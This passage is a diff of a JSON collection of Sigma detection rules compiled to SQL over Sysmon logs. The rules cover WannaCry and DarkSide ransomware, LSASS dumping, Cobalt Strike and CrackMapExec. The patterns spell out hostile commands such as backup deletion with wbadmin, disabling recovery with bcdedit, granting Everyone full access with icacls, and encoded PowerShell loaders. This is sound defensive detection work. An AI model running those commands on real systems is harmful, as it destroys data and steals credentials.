'%\\\\mssecsvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskdl.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhsvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskse.exe' ESCAPE '\\' OR Image LIKE '%\\\\111.exe' ESCAPE '\\' OR Image LIKE '%\\\\lhdfrgui.exe' ESCAPE '\\' OR Image LIKE '%\\\\linuxnew.exe' ESCAPE '\\' OR Image LIKE '%\\\\wannacry.exe' ESCAPE '\\') OR Image LIKE '%WanaDecryptor%' ESCAPE '\\' OR (CommandLine LIKE '%icacls%' ESCAPE '\\' AND CommandLine LIKE '%/grant%' ESCAPE '\\' AND CommandLine LIKE '%Everyone:F%' ESCAPE '\\' AND CommandLine LIKE '%/T%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\') OR (CommandLine LIKE '%bcdedit%' ESCAPE '\\' AND CommandLine LIKE '%/set%' ESCAPE '\\' AND CommandLine LIKE '%{default}%' ESCAPE '\\' AND CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\') OR (CommandLine LIKE '%wbadmin%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%-quiet%' ESCAPE '\\') OR CommandLine LIKE '%@Please\\_Read\\_Me@.txt%' ESCAPE '\\'))" + 
"SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND Image LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') OR ParentImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_wannacry.yml" + "filename": "proc_creation_win_imagingdevices_unusual_parents.yml" }, { - "title": "Potential Manage-bde.wsf Abuse To Proxy Execution", - "id": "c363385c-f75d-4753-a108-c1a8e28bdbda", - "status": "test", - "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", - "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - SecurityXploded Execution", + "id": "7679d464-4f74-45e2-9e01-ac66c5eb041a", + "status": "stable", + "description": "Detects the execution of SecurityXploded Tools", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.credential_access", + "attack.t1555" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR OriginalFileName = 'wscript.exe') AND CommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') OR (((ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\cmd.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Company = 'SecurityXploded' OR Image LIKE '%PasswordDump.exe' ESCAPE '\\' OR OriginalFileName LIKE '%PasswordDump.exe' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_lolbin_manage_bde.yml" + "filename": "proc_creation_win_hktl_secutyxploded.yml" }, { - "title": "Potential MSTSC Shadowing Activity", - "id": "6ba5a05f-b095-4f0a-8654-b825f4f16334", - "status": "test", - "description": "Detects RDP session hijacking by using MSTSC shadowing", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Modification Of Scheduled Tasks", + "id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", + "status": "experimental", + "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1563.002" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%noconsentprompt%' ESCAPE '\\' AND CommandLine LIKE '%shadow:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /Change %' ESCAPE '\\' AND CommandLine LIKE '% /TN %' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR 
CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\') AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%bash.exe%' ESCAPE '\\' OR CommandLine LIKE '%bash %' ESCAPE '\\' OR CommandLine LIKE '%scrcons%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%forfiles%' ESCAPE '\\' OR CommandLine LIKE '%scriptrunner%' ESCAPE '\\' OR CommandLine LIKE '%hh.exe%' ESCAPE '\\' OR CommandLine LIKE '%hh %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml" + "filename": "proc_creation_win_schtasks_change.yml" }, { - "title": "HackTool - SharpUp PrivEsc Tool Execution", - "id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", - "status": "experimental", - "description": "Detects the use of SharpUp, a tool for local privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "title": "Non-privileged Usage of Reg or Powershell", + "id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", + "status": "test", + "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", + "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", "tags": [ - 
"attack.privilege_escalation", - "attack.t1615", - "attack.t1569.002", - "attack.t1574.005" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpUp.exe' ESCAPE '\\' OR Description = 'SharpUp' OR (CommandLine LIKE '%HijackablePaths%' ESCAPE '\\' OR CommandLine LIKE '%UnquotedServicePath%' ESCAPE '\\' OR CommandLine LIKE '%ProcessDLLHijack%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableServiceBinaries%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableScheduledTask%' ESCAPE '\\' OR CommandLine LIKE '%DomainGPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%CachedGPPPassword%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%set-itemproperty%' ESCAPE '\\' OR CommandLine LIKE '% sp %' ESCAPE '\\' OR CommandLine LIKE '%new-itemproperty%' ESCAPE '\\')) AND (IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%Services%' ESCAPE '\\' AND (CommandLine LIKE '%ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%ServiceDLL%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sharpup.yml" + "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml" }, { - "title": "DarkSide Ransomware Pattern", - "id": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "title": "Suspicious Outlook Child Process", + "id": "208748f7-881d-47ac-a29c-07ea84bf691d", "status": "test", - "description": "Detects DarkSide Ransomware and helpers", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious process spawning from an Outlook process.", + "author": "Michael Haag, Florian 
Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team", "tags": [ "attack.execution", - "attack.t1204" + "attack.t1204.002" ], "falsepositives": [ - "Unknown", - "UAC bypass method used by other malware" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%=[char][byte](''0x''+%' ESCAPE '\\' OR CommandLine LIKE '% -work worker0 -path %' ESCAPE '\\') OR (ParentCommandLine LIKE '%DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_darkside_ransomware.yml" + "filename": "proc_creation_win_office_outlook_susp_child_processes.yml" }, { - "title": "Time Travel Debugging Utility Usage", - "id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", + 
"title": "Winnti Malware HK University Campaign", + "id": "3121461b-5aa0-4a41-b910-66d25524edbb", "status": "test", - "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", + "author": "Florian Roth (Nextron Systems), Markus Neis", "tags": [ "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" + "attack.t1574.002", + "attack.g0044" ], "falsepositives": [ - "Legitimate usage by software developers/testers" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\tttracer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR ParentImage LIKE '%\\\\hpqhvind.exe%' ESCAPE '\\') AND Image LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\' AND Image LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\Test.exe' ESCAPE '\\' AND Image LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR Image LIKE 'C:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe' ESCAPE '\\' OR (ParentImage LIKE 'C:\\\\ProgramData\\\\DRM\\\\Windows%' ESCAPE '\\' AND Image LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml" + "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml" }, { - "title": "LSASS Memory Dumping", - "id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", - "status": "test", - "description": "Detect creation of dump files containing the memory space of lsass.exe, which 
contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "title": "PUA - CsExec Execution", + "id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", + "status": "experimental", + "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.resource_development", + "attack.t1587.001", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%lsass%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\werfault.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\csexec.exe' ESCAPE '\\' OR Description = 'csexec'))" ], - "filename": "proc_creation_win_susp_lsass_dump.yml" + "filename": "proc_creation_win_pua_csexec.yml" }, { - "title": "Exploit for CVE-2015-1641", - "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "title": "Potential Crypto Mining Activity", + "id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", "status": "stable", - "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", + "description": "Detects command line parameters or strings often used by crypto miners", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.impact", + "attack.t1496" ], "falsepositives": [ - "Unknown" + "Legitimate use of crypto miners", + "Some build frameworks" ], - "level": "critical", + "level": "high", "rule": [ - 
"SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\MicroScMgmt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% pool.c %' ESCAPE '\\' OR CommandLine LIKE '% pool.o %' ESCAPE '\\' OR CommandLine LIKE '%gcc -%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2015_1641.yml" + "filename": "proc_creation_win_susp_crypto_mining_monero.yml" }, { - "title": "Renamed BrowserCore.EXE Execution", - "id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", - "status": "experimental", - "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", - "author": "Max Altgelt (Nextron Systems)", + "title": "Exploit for CVE-2017-8759", + "id": "fdd84c68-a1f6-47c9-9477-920584f94905", + "status": "test", + "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1528", - 
"attack.t1036.003" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'BrowserCore.exe' AND NOT ((Image LIKE '%\\\\BrowserCore.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\csc.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_browsercore.yml" + "filename": "proc_creation_win_exploit_cve_2017_8759.yml" }, { - "title": "Manage Engine Java Suspicious Sub Process", - "id": "cea2b7ea-792b-405f-95a1-b903ea06458f", - "status": "experimental", - "description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process", - "author": "Florian Roth (Nextron Systems)", + "title": "Interactive AT Job", + "id": "60fc936d-2eb0-4543-8a13-911c750a1dfc", + "status": "test", + "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "tags": [ + "attack.privilege_escalation", + "attack.t1053.002" + ], "falsepositives": [ - "Legitimate sub processes started by Manage Engine ServiceDesk Pro" + "Unlikely (at.exe deprecated as of Windows 8)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\ManageEngine\\\\ServiceDesk\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\java.exe%' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\at.exe' ESCAPE '\\' AND CommandLine LIKE '%interactive%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_manageengine_pattern.yml" + "filename": 
"proc_creation_win_at_interactive_execution.yml" }, { - "title": "PsExec Service Child Process Execution as LOCAL SYSTEM", - "id": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", + "title": "Operator Bloopers Cobalt Strike Modules", + "id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", "status": "experimental", - "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%zerologon%' ESCAPE '\\' OR CommandLine LIKE '%av\\_query%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml" + "filename": 
"proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" }, { - "title": "HackTool - CrackMapExec Execution Patterns", - "id": "058f4380-962d-40a5-afce-50207d36d7e2", - "status": "stable", - "description": "Detects various execution patterns of the CrackMapExec pentesting framework", - "author": "Thomas Patzke", + "title": "PUA - Nmap/Zenmap Execution", + "id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", + "status": "test", + "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1053", - "attack.t1059.003", - "attack.t1059.001", - "attack.s0106" + "attack.discovery", + "attack.t1046" ], "falsepositives": [ - "Unknown" + "Network administrator computer" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%cmd.exe /Q /c % 1> \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > %\\\\Temp\\\\% 2>&1' ESCAPE '\\') AND (CommandLine LIKE '%powershell.exe -exec bypass -noni -nop -w 1 -C \"%' ESCAPE '\\' OR CommandLine LIKE '%powershell.exe -noni -nop -w 1 -enc %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\nmap.exe' ESCAPE '\\' OR Image LIKE '%\\\\zennmap.exe' ESCAPE '\\') OR OriginalFileName IN ('nmap.exe', 'zennmap.exe')))" ], - "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml" + "filename": "proc_creation_win_pua_nmap_zenmap.yml" }, { - "title": "Suspicious Encoded Obfuscated LOAD String", - "id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", - "status": "test", - "description": "Detects suspicious base64 encoded and obbfuscated LOAD string often used for 
reflection.assembly load", - "author": "pH-T (Nextron Systems)", + "title": "HackTool - GMER Rootkit Detector and Remover Execution", + "id": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", + "status": "experimental", + "description": "Detects the execution GMER tool based on image and hash fields.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.defense_evasion" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvACIAKwAiAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvAGEAIgArACIAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvACcAKwAnAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvAGEAJwArACcAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
